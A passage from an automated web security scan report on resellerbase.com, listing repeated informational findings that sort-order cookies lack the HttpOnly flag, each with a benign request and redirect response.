POST /tag/dropshipper HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dropshipper
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:53:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/dropshipper
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.73. http://www.resellerbase.com/tag/eBook

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/eBook

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/eBook HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/eBook
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:53:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/eBook
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.74. http://www.resellerbase.com/tag/flights

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/flights

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/flights HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/flights
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:55:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/flights
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.75. http://www.resellerbase.com/tag/googlepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/googlepr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/googlepr.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:59:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/googlepr.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.76. http://www.resellerbase.com/tag/host

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/host

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/host HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/host
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/host
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.77. http://www.resellerbase.com/tag/hosting

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/hosting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/hosting HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/hosting
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/hosting
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.78. http://www.resellerbase.com/tag/hotel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/hotel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/hotel HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/hotel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/hotel
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.79. http://www.resellerbase.com/tag/internet+access

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/internet+access

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/internet+access HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/internet+access
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/internet+access
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.80. http://www.resellerbase.com/tag/master+resell+rights

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/master+resell+rights

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/master+resell+rights HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/master+resell+rights
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:53:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/master+resell+rights
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.81. http://www.resellerbase.com/tag/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/mobile

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/mobile HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/mobile
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:55:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/mobile
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.82. http://www.resellerbase.com/tag/personals

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/personals

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/personals HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/personals
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/personals
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.83. http://www.resellerbase.com/tag/phone

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/phone

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/phone HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/phone
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/phone
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.84. http://www.resellerbase.com/tag/private+label

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/private+label

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/private+label HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/private+label
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:58:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/private+label
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.85. http://www.resellerbase.com/tag/resel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/resel HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:58:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/resel
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.86. http://www.resellerbase.com/tag/resell

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resell

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/resell HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resell
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:58:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/resell
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.87. http://www.resellerbase.com/tag/reseller+programs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reseller+programs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/reseller+programs HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reseller+programs
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/reseller+programs
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.88. http://www.resellerbase.com/tag/reseller+rights

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reseller+rights

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/reseller+rights HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reseller+rights
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/reseller+rights
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.89. http://www.resellerbase.com/tag/resellers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resellers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/resellers HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resellers
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:58:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/resellers
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.90. http://www.resellerbase.com/tag/reselling

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reselling

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/reselling HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reselling
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:58:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/reselling
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.91. http://www.resellerbase.com/tag/ringtones

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/ringtones

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/ringtones HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/ringtones
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:55:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/ringtones
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.92. http://www.resellerbase.com/tag/script

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/script

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/script HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/script
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:56:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/script
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.93. http://www.resellerbase.com/tag/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:59:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/search.php?keyword=search...&Submit3=Search&opt=2
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.94. http://www.resellerbase.com/tag/sex

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/sex

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/sex HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/sex
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:56:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/sex
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.95. http://www.resellerbase.com/tag/singels

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/singels

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/singels HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/singels
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/singels
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.96. http://www.resellerbase.com/tag/software

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/software

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/software HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/software
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:56:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/software
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.97. http://www.resellerbase.com/tag/telephone

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/telephone

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/telephone HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/telephone
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/telephone
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.98. http://www.resellerbase.com/tag/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

